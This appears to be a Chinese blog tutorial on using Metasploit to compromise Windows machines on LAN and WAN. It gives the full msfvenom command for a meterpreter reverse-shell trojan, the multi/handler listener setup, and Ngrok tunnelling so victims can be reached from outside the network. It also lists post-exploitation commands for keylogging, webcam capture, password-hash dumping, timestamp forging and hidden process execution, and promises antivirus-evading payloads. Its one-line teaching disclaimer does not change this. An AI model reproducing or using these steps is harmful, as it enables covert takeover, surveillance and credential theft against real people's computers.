Metasploit是一个免费的、可下载的框架,通过它可以很容易地获取、开发并对计算机软件漏洞实施攻击。它本身附带数千个已知软件漏洞的专业级漏洞攻击工具。当H.D. Moore在2003年发布Metasploit时,计算机安全状况也被永久性地改变了。

Metasploit可以用来信息收集、漏洞探测、漏洞利用等渗透测试的全流程,被安全社区冠以“可以黑掉整个宇宙”之名。刚开始的Metasploit是采用Perl语言编写的,但是再后来的新版中,改成了用Ruby语言编写的了。在kali中,自带了Metasploit工具。

一、(内网渗透)内网英文缩写LAN;内网又称局域网

局域网的覆盖范围一般是方圆几千米之内,其具备的安装便捷、成本节约、扩展方便等特点使其在各类办公室内运用广泛。局域网可以实现文件管理、应用软件共享、打印机共享等功能,在使用过程当中,通过维护局域网网络安全,能够有效地保护资料安全,保证局域网网络能够正常稳定的运行。

使用MSF制作木马:

msf opthions:-p, --payload 指定需要使用的payload(攻击荷载)。如果需要使用自定义的payload,请使用’-'或者stdin指定-l, --list [module_type] 列出指定模块的所有可用资源. 模块类型包括: payloads, encoders, nops, all-n, --nopsled 为payload预先指定一个NOP滑动长度-f, --format 指定输出格式 (使用 —help-formats 来获取msf支持的输出格式列表)-e, --encoder [encoder] 指定需要使用的encoder(编码器)-a, --arch 指定payload的目标架构--platform 指定payload的目标平台-s, --space 设定有效攻击荷载的最大长度-b, --bad-chars 设定规避字符集,比如: ‘\x00\xff’-i, --iterations 指定payload的编码次数-c, --add-code 指定一个附加的win32 shellcode文件-x, --template 指定一个自定义的可执行文件作为模板-k, --keep 保护模板程序的动作,注入的payload作为一个新的进程运行--payload-options 列举payload的标准选项-o, --out 保存payload-v, --var-name 指定一个自定义的变量,以确定输出格式--shellest 最小化生成payload-h, —help 查看帮助选项--help-formats 查看msf支持的输出格式列表

1、用ip a或者ifconfig查询kali 的ip

-p:指定payload脚本模块,lhost:指定传回本地kali的IP,(我本机kali地址为192.168.245.140)

lport:指定传回kali的端口,-f:输出文件类型,

-o:指定存放路径和要生成的脚本名称。

2、制作木马命令:

msfvenom -p windows/meterpreter/reverse_tcp lhost=xxxx.xxx.xxx lport=4444 -f exe -o /root/shell.exe 

在kali的root目录下把刚刚生成的脚本发给同一局域网下的Windows目标主机(如果是在虚拟机下测试虚拟机网络设置为NAT模式或者桥接模式这样kali和windows就处于同一局域网下;测试下windows是否能够ping通kali,两台主机不能够ping通的话受害机运行木马程序是不会反弹shell)

3、打开MSF控制台

msfconsole

 4、设置payload,加载攻击模块设置本地IP和监听端口

use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.245.140
set LPORT 4444

show options (查看IP端口设置情况)
run (开启监听)

等待目标主机执行木马反弹shell即可操控对方电脑

Metasploit脚本命令:

系统模块
Help:打开 Meterpreter 使用帮助
run scriptname:运行 Meterpreter 脚本,在 scripts/meterpreter 目录下可查看到所有脚本
use priv:加载特权提升扩展模块,来扩展 Meterpreter 库
getprivs:尽可能多地获取目标主机上的特权
per:通过各种攻击向量来提升到系统用户权限
shell : 以所有可用令牌来运行一个交互的shell
hashdump:导出目标主机中的口令哈希值
rev2self:回到控制目标主机的初始用户账户下
setdesktop number:切换到另一个用户界面(该功能基于哪些用户已登录)
screenshot:对目标主机的屏幕进行截图
background:将当前 Meterpreter shell 转为后台执行
quit:关闭当前Meterpreter会话,返回MSF终
webcam_list (查看有无摄像头)
webcam_snap (通过摄像头拍照)
webcam_stream (通过摄像头开启视频)
鼠标键盘模块
uictl开关键盘/鼠标
uictl disable mouse (禁用鼠标)
uictl disable keyboard(禁用键盘)uictl enable mouse (启用鼠标)
uictl enable keyboard (启用键盘)
keyscan_start 针对目标主机开启键盘记录功能
keyscan_dump 存储目标主机上捕获的键盘记录
keyscan_stop 停止针对目标主机的键盘记录
uictl enable keyboard/mouse接管目标主机的键盘和鼠标
文件模块
ls列出目标主机的文件和文件夹信息
reg command在目标主机注册表中进行交互,创建、删除、查询等
upload file向目标主机上传文件
download file从目标主机下载文件
timestomp修改文件属性,例如修改文件的创建时间
例如:timestomp file1 -f file2将file1文件的时间信息设置得与file2文件完全一样
cat查看文件内容
getwd获得目标机上当前的工作目录
edit编辑目标机上的文件
search对目标机上的文件进行搜索,支持星号匹配,如
search -d c:\windows -f *.mdb
execute执行文件
execute (在目标机执行文件)
execute -f cmd.exe -H -i -t(创建新进程cmd.exe, -H不可见,-i交互)
shutdown -r (重启)
shutdown -p(立即关机)

二、(外网渗透)外网英文缩写WAN;外网又称广域网、公网。

外网是连接不同地区局域网或城域网计算机通信的远程网。通常跨接很大的物理范围,所覆盖的范围从几十公里到几千公里,它能连接多个地区、城市和国家,或横跨几个洲并能提供远距离通信,形成国际性的远程网络。广域网并不等同于互联网。

处于不同局域网的两台主机是不能够互相ping通的,所以必须将攻击者的ip映射到公网上,这样受害机运行木马才能够反弹shell。

内网穿透是我们在进行网络连接时的一种术语,也叫做NAT穿透,即在计算机是局域网内的时候,外网与内网的计算机的节点进行连接时所需要的连接通信,有时候就会出现内网穿透不支的情况。内网穿透的功能就是,当我们在端口映射时设置时,内网穿透起到了地址转换的功能,也就是把公网的地址进行翻译,转成为一种私有的地址,然后再采用路由的方式ADSL的宽带路由器,具有一个动态或者是固定的公网IP,最后ADSL直接在交换机上,这样所有的电脑都可以共享上网。内网穿透除了可以实现内网之间机器的网络通信功通之外。

一旦获得了对系统的访问权限,攻击者可以进行侦听,横向移动及尝试提升特权,达到窃取系统或数据库中敏感数据的目的,对服务器安全乃至内网安全的危害不言而喻。

这里我们到Sunny-Ngrok内网穿透服务使kali主机与Sunny-Ngrok公网服务器连接,这样处于不同局域网的主机访问Sunny-Ngrok给出的TCP隧道,数据将会传回kali主机。

Sunny-Ngrok提供免费内网穿透服务,免费服务器支持绑定自定义域名

1、进入Ngrok网站注册一个用户(Sunny-Ngrok内网转发内网穿透 - 国内内网映射服务器)

2、开通TCP隧道

3、下载Ngrok客户端(Sunny-Ngrok内网转发)

根据攻击机系统情况下载客户端版本(这里下载Linux 64bita版本)

把下载好的Ngrok压缩包存放到kali的root目录下

命令解压缩:unzip linux_amd64(压缩包名)

进入解压好的目录:

cd linux_amd64

启动隧道映射TCP服务:

./sunny clientid (隧道id)

4、MSF生成外网木马程序

注意:这里lhost和lport分别为赠送的域名和端口

msfvenom -p windows/meterpreter/reverse_tcp lhost=xxx.xxx.com lport=10306 -f exe -o /root/shell.exe

lhost填TCP隧道上面的域名,lport填TCP域名后面的端口

5、打开msf设置payload,加载攻击模块设置本地IP和监听端口

msfconsole

use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.245.140
set LPORT 4444

show options (查看IP端口设置情况)
run (开启监听)

 6、转发生成的木马程序给目标机运行-目标机运行木马-反弹shell-操控目标机

7、对目标主机进行截图看看对方电脑正在干什么

screenshot

 root目录下查看截图

该教程仅用于信息防御技术教学请勿用于其他用途

后续更新免杀payload木马程序,过360、火绒。

Kali使用Metasploit内、外网渗透windows系统相关推荐

  1. 【渗透测试笔记】之【内网渗透——Windows系统散列值获取与防范】

    拓扑图 Windows系统散列值获取 1.通过CS模块获取用户凭证信息 在获取到目标主机权限后,我们可以抓取hash和dump明文密码,这两项功能都需要管理员权限,如果权限不足,先要进行提权操作. 抓 ...

  2. 内网渗透-Windows内网渗透

    内网渗透-Windows内网渗透 文章目录 内网渗透-Windows内网渗透 前言 一.信息收集 1.1.SPN 1.2.端口连接 1.3.配置文件 1.4.用户信息 1.6.会话收集 1.7.凭据收 ...

  3. 内网渗透——WINDOWS认证机制之KERBEROS

    之前两篇文章整理了NTLM协议的分析与利用 1.内网渗透--WINDOWS认证机制之NTLM 2.利用netsh抓取连接文件服务器的NET NTLM Hash 本篇文章来学习域内认证的Kerberos ...

  4. MSF外网渗透+shellcode免杀

    1. 内网穿透 使用的Sunny-Ngrok服务 .你在Sunny-Ngrok官网注册好后获得一条免费或付费的隧道,添加tcp通道,端口号自定. 官网链接:https://www.ngrok.cc/( ...

  5. msfvenom的使用免杀外网渗透

    msfvenom的基本使用 这玩意是啥我就不介绍了,懂得都懂. 这篇博客将结合我本人的自身经验来说明大致的使用方式,这里的话只介绍,目前比较常用的几个方法和参数. payload 查看与使用 payl ...

  6. 2021-12-09 使用kali生成木马,渗透Windows系统

    本文章仅供学习和参考! 欢迎交流~ 目录 一.实验题目:使用kali生成木马,渗透Windows系统 二.实验内容: 使用kali中的Metasploit生成木马,控制Windows系统 三.实验环境 ...

  7. 网络安全之ENC1应用内/外网音视频传输完全隔离方案

    网络安全之ENC1应用内/外网音视频传输完全隔离方案 大家好,又见面了,前两天某客户买了ENC1两台,在支持的过程中,居然发现原来还能这样用,看来ENC1不火都不行啊. 随着计算机技术的飞速发展,信息 ...

  8. 外网质量监控系统实践之路

    女主宣言 _ _ _ _ _ 用户在访问360服务器时,会经过运营商链路.各省的机房然后到达vip,那么在这个链路中任何一个环节出现问题,都会导致用户无法正常上网.如何快速.准确的定位到这个链路中的哪 ...

  9. 超牛叉的外网渗透详细教程

    文章来源 简书 https://mp.weixin.qq.com/s/oGUDJxPOfCz2CW-mCeeAlQ(原文) 众所周知,Metasploit 是个内网渗透神器. 但是内网渗透哪有外网刺激 ...

最新文章

  1. ai作文批改_英语写作怎么提升?讯飞智能学习机AI作文批改带你实战练习
  2. linux 进程管理 ppt,Linux内核结构与进程管理.ppt
  3. CF-241 E.Flights(差分约束)
  4. Tcp与Ip协议的客户端和服务器编程
  5. ArrayList的容量
  6. 对于内向、不善于社交的人来说,如何建立人脉?
  7. 同理qt也一样蜡笔小新
  8. linux中 在文件中写入一句话怎么写_shell文件处理笔记之插入文本到文件的方法...
  9. poj 2083 Fractal 纯递归,挺好, 我的版本
  10. 微信小程序模版合集下载,160个微信小程序源码.zip + 35个行业-微信小程序源码.zip
  11. 记一次‘勒索病毒’经历
  12. lisp 角平分线_最佳Visual LISP及VBA for AutoCAD2000程序123例
  13. 微信小程序直播是怎么做的
  14. Ubuntu18.04下利用Gazebo搭建赛道完成ROS机器人定位导航仿真 + 加载YOLO检测识别标记物体【智能车】
  15. 修复 Windows 10 设置界面里面混乱的语言翻译
  16. 王家林大数据资源共享
  17. 【IT互联网系列】什么是网关?网关的作用是什么?看完不懂,你捶我
  18. 咖啡师学习需要注意什么
  19. 服务器您的网络已被劫持请立即修复,网页被劫持并跳转到发布网络的修复方法...
  20. 杭电2019多校第三场 HDU-6608 Fansblog(威尔逊定理+素数间隔+逆元)

热门文章

  1. 使用邮箱教学|邮箱是什么?办公中是怎么使用的
  2. 用python可以做什么有趣的事情_用python做一些有趣的事(一)——根据照片制作版画...
  3. CO-PA: 获利能力分析数据的传送(日常业务)
  4. 三、大数据存储——HBase
  5. 计算机知识产权有哪些,计算机类专利有哪些可以申请
  6. Firefox如何给页面权限
  7. css3绘制的钢琴代码
  8. CSS奇思妙想—使用 mask 实现视频弹幕人物遮罩过滤
  9. ubantu22与windows相互复制粘贴(详细图文)
  10. 有度即时通统一工作门户助力政企单位开启数字化办公新模式